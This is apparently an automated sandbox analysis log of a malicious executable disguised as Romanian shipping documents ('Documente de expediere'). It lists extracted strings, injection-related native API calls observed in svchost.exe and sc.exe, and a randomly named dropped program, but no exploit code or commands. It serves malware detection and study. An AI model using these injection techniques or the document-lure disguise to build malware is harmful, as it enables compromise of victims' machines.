Source: AWB_5771388044 Documente de expediere.exe, 00000000.00000000.1343977915.0000000000A54000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_262db8c6-9
Source: AWB_5771388044 Documente de expediere.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_028c6876-0
Source: AWB_5771388044 Documente de expediere.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_8209c2f4-4

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: AWB_5771388044 Documente de expediere.exe

Source: C:\Windows\SysWOW64\svchost.exe

Process Stats: CPU usage > 49%

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042CDA3 NtClose,	2_2_0042CDA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672B60 NtClose,LdrInitializeThunk,	2_2_03672B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_03672DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036735C0 NtCreateMutant,LdrInitializeThunk,	2_2_036735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03674340 NtSetContextThread,	2_2_03674340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03674650 NtSuspendThread,	2_2_03674650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672BE0 NtQueryValueKey,	2_2_03672BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672BF0 NtAllocateVirtualMemory,	2_2_03672BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672BA0 NtEnumerateValueKey,	2_2_03672BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672B80 NtQueryInformationFile,	2_2_03672B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672AF0 NtWriteFile,	2_2_03672AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672AD0 NtReadFile,	2_2_03672AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672AB0 NtWaitForSingleObject,	2_2_03672AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672F60 NtCreateProcessEx,	2_2_03672F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672F30 NtCreateSection,	2_2_03672F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672FE0 NtCreateFile,	2_2_03672FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672FA0 NtQuerySection,	2_2_03672FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672FB0 NtResumeThread,	2_2_03672FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672F90 NtProtectVirtualMemory,	2_2_03672F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672E30 NtWriteVirtualMemory,	2_2_03672E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672EE0 NtQueueApcThread,	2_2_03672EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672EA0 NtAdjustPrivilegesToken,	2_2_03672EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672E80 NtReadVirtualMemory,	2_2_03672E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672D30 NtUnmapViewOfSection,	2_2_03672D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672D00 NtSetInformationFile,	2_2_03672D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672D10 NtMapViewOfSection,	2_2_03672D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672DD0 NtDelayExecution,	2_2_03672DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672DB0 NtEnumerateKey,	2_2_03672DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672C60 NtCreateKey,	2_2_03672C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672C70 NtFreeVirtualMemory,	2_2_03672C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672C00 NtQueryInformationProcess,	2_2_03672C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672CF0 NtOpenProcess,	2_2_03672CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672CC0 NtQueryVirtualMemory,	2_2_03672CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672CA0 NtQueryInformationToken,	2_2_03672CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03673010 NtOpenDirectoryObject,	2_2_03673010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03673090 NtSetValueKey,	2_2_03673090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036739B0 NtGetContextThread,	2_2_036739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03673D70 NtOpenThread,	2_2_03673D70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03673D10 NtOpenProcessToken,	2_2_03673D10
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A34340 NtSetContextThread,LdrInitializeThunk,	7_2_03A34340
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A34650 NtSuspendThread,LdrInitializeThunk,	7_2_03A34650
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A32BA0 NtEnumerateValueKey,LdrInitializeThunk,	7_2_03A32BA0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A32BE0 NtQueryValueKey,LdrInitializeThunk,	7_2_03A32BE0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A32BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	7_2_03A32BF0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A32B60 NtClose,LdrInitializeThunk,	7_2_03A32B60
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A32AF0 NtWriteFile,LdrInitializeThunk,	7_2_03A32AF0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A32AD0 NtReadFile,LdrInitializeThunk,	7_2_03A32AD0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A32FB0 NtResumeThread,LdrInitializeThunk,	7_2_03A32FB0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A32FE0 NtCreateFile,LdrInitializeThunk,	7_2_03A32FE0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A32F30 NtCreateSection,LdrInitializeThunk,	7_2_03A32F30
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A32E80 NtReadVirtualMemory,LdrInitializeThunk,	7_2_03A32E80
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A32EE0 NtQueueApcThread,LdrInitializeThunk,	7_2_03A32EE0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A32DF0 NtQuerySystemInformation,LdrInitializeThunk,	7_2_03A32DF0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A32DD0 NtDelayExecution,LdrInitializeThunk,	7_2_03A32DD0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A32D30 NtUnmapViewOfSection,LdrInitializeThunk,	7_2_03A32D30
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A32D10 NtMapViewOfSection,LdrInitializeThunk,	7_2_03A32D10
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A32CA0 NtQueryInformationToken,LdrInitializeThunk,	7_2_03A32CA0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A32C60 NtCreateKey,LdrInitializeThunk,	7_2_03A32C60
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A32C70 NtFreeVirtualMemory,LdrInitializeThunk,	7_2_03A32C70
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A335C0 NtCreateMutant,LdrInitializeThunk,	7_2_03A335C0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A339B0 NtGetContextThread,LdrInitializeThunk,	7_2_03A339B0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A32B80 NtQueryInformationFile,	7_2_03A32B80
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A32AB0 NtWaitForSingleObject,	7_2_03A32AB0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A32FA0 NtQuerySection,	7_2_03A32FA0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A32F90 NtProtectVirtualMemory,	7_2_03A32F90
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A32F60 NtCreateProcessEx,	7_2_03A32F60
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A32EA0 NtAdjustPrivilegesToken,	7_2_03A32EA0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A32E30 NtWriteVirtualMemory,	7_2_03A32E30
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A32DB0 NtEnumerateKey,	7_2_03A32DB0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A32D00 NtSetInformationFile,	7_2_03A32D00
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A32CF0 NtOpenProcess,	7_2_03A32CF0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A32CC0 NtQueryVirtualMemory,	7_2_03A32CC0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A32C00 NtQueryInformationProcess,	7_2_03A32C00
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A33090 NtSetValueKey,	7_2_03A33090
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A33010 NtOpenDirectoryObject,	7_2_03A33010
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A33D10 NtOpenProcessToken,	7_2_03A33D10
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A33D70 NtOpenThread,	7_2_03A33D70
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_032397B0 NtReadFile,	7_2_032397B0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03239640 NtCreateFile,	7_2_03239640
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03239AC0 NtAllocateVirtualMemory,	7_2_03239AC0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03239960 NtClose,	7_2_03239960
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_032398B0 NtDeleteFile,	7_2_032398B0

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_00A0A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_00A0A1EF

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_009F8310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_009F8310

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_00A051BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_00A051BD

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_009AE6A0	0_2_009AE6A0
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_009CD975	0_2_009CD975
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_009AFCE0	0_2_009AFCE0
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_009C21C5	0_2_009C21C5
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_009D62D2	0_2_009D62D2
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00A203DA	0_2_00A203DA
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_009D242E	0_2_009D242E
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_009C25FA	0_2_009C25FA
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_009B66E1	0_2_009B66E1
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_009FE616	0_2_009FE616
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_009D878F	0_2_009D878F
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00A08889	0_2_00A08889
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_009B8808	0_2_009B8808
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_009D6844	0_2_009D6844
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00A20857	0_2_00A20857
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_009CCB21	0_2_009CCB21
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_009D6DB6	0_2_009D6DB6
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_009B6F9E	0_2_009B6F9E
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_009B3030	0_2_009B3030
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_009C3187	0_2_009C3187
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_009CF1D9	0_2_009CF1D9
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_009A1287	0_2_009A1287
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_009C1484	0_2_009C1484
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_009B5520	0_2_009B5520
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_009C7696	0_2_009C7696
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_009B5760	0_2_009B5760
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_009C1978	0_2_009C1978
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_009D9AB5	0_2_009D9AB5
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_009C1D90	0_2_009C1D90
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_009CBDA6	0_2_009CBDA6
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00A27DDB	0_2_00A27DDB
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_009B3FE0	0_2_009B3FE0
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_009ADF00	0_2_009ADF00
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_01317B78	0_2_01317B78
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418C13	2_2_00418C13
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403190	2_2_00403190
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042F3C3	2_2_0042F3C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00410403	2_2_00410403
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416E13	2_2_00416E13
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E613	2_2_0040E613
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00410623	2_2_00410623
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E757	2_2_0040E757
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E75F	2_2_0040E75F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E763	2_2_0040E763
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004027D0	2_2_004027D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036FA352	2_2_036FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0364E3F0	2_2_0364E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037003E6	2_2_037003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036E0274	2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036C02C0	2_2_036C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036C8158	2_2_036C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03630100	2_2_03630100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036DA118	2_2_036DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036F81CC	2_2_036F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037001AA	2_2_037001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03640770	2_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03664750	2_2_03664750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363C7C0	2_2_0363C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365C6E0	2_2_0365C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03640535	2_2_03640535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03700591	2_2_03700591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036F2446	2_2_036F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036EE4F6	2_2_036EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036FAB40	2_2_036FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036F6BD7	2_2_036F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363EA80	2_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03656962	2_2_03656962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036429A0	2_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0370A9A6	2_2_0370A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0364A840	2_2_0364A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03642840	2_2_03642840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366E8F0	2_2_0366E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036268B8	2_2_036268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B4F40	2_2_036B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03682F28	2_2_03682F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03660F30	2_2_03660F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0364CFE0	2_2_0364CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03632FC8	2_2_03632FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036BEFA0	2_2_036BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03640E59	2_2_03640E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036FEE26	2_2_036FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036FEEDB	2_2_036FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03652E90	2_2_03652E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036FCE93	2_2_036FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0364AD00	2_2_0364AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363ADE0	2_2_0363ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03658DBF	2_2_03658DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03640C00	2_2_03640C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03630CF2	2_2_03630CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036E0CB5	2_2_036E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362D34C	2_2_0362D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036F132D	2_2_036F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0368739A	2_2_0368739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036E12ED	2_2_036E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365B2C0	2_2_0365B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036452A0	2_2_036452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0367516C	2_2_0367516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362F172	2_2_0362F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0370B16B	2_2_0370B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0364B1B0	2_2_0364B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036F70E9	2_2_036F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036FF0E0	2_2_036FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036EF0CC	2_2_036EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036470C0	2_2_036470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036FF7B0	2_2_036FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036F16CC	2_2_036F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036F7571	2_2_036F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036DD5B0	2_2_036DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03631460	2_2_03631460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036FF43F	2_2_036FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036FFB76	2_2_036FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B5BF0	2_2_036B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0367DBF9	2_2_0367DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365FB80	2_2_0365FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B3A6C	2_2_036B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036FFA49	2_2_036FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036F7A46	2_2_036F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036EDAC6	2_2_036EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036DDAAC	2_2_036DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03685AA0	2_2_03685AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03649950	2_2_03649950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365B950	2_2_0365B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036AD800	2_2_036AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036438E0	2_2_036438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036FFF09	2_2_036FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036FFFB1	2_2_036FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03641F92	2_2_03641F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03649EB0	2_2_03649EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036F7D73	2_2_036F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03643D40	2_2_03643D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036F1D5A	2_2_036F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365FDC0	2_2_0365FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B9C32	2_2_036B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036FFCF2	2_2_036FFCF2
Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	Code function: 6_2_02DCF252	6_2_02DCF252
Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	Code function: 6_2_02DEE212	6_2_02DEE212
Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	Code function: 6_2_02DCF472	6_2_02DCF472
Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	Code function: 6_2_02DCD462	6_2_02DCD462
Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	Code function: 6_2_02DD5C62	6_2_02DD5C62
Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	Code function: 6_2_02DCD5B2	6_2_02DCD5B2
Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	Code function: 6_2_02DCD5AE	6_2_02DCD5AE
Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	Code function: 6_2_02DCD5A6	6_2_02DCD5A6
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03AC03E6	7_2_03AC03E6
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A0E3F0	7_2_03A0E3F0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03ABA352	7_2_03ABA352
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A802C0	7_2_03A802C0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03AA0274	7_2_03AA0274
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03AC01AA	7_2_03AC01AA
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03AB81CC	7_2_03AB81CC
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_039F0100	7_2_039F0100
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A9A118	7_2_03A9A118
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A88158	7_2_03A88158
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A92000	7_2_03A92000
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_039FC7C0	7_2_039FC7C0
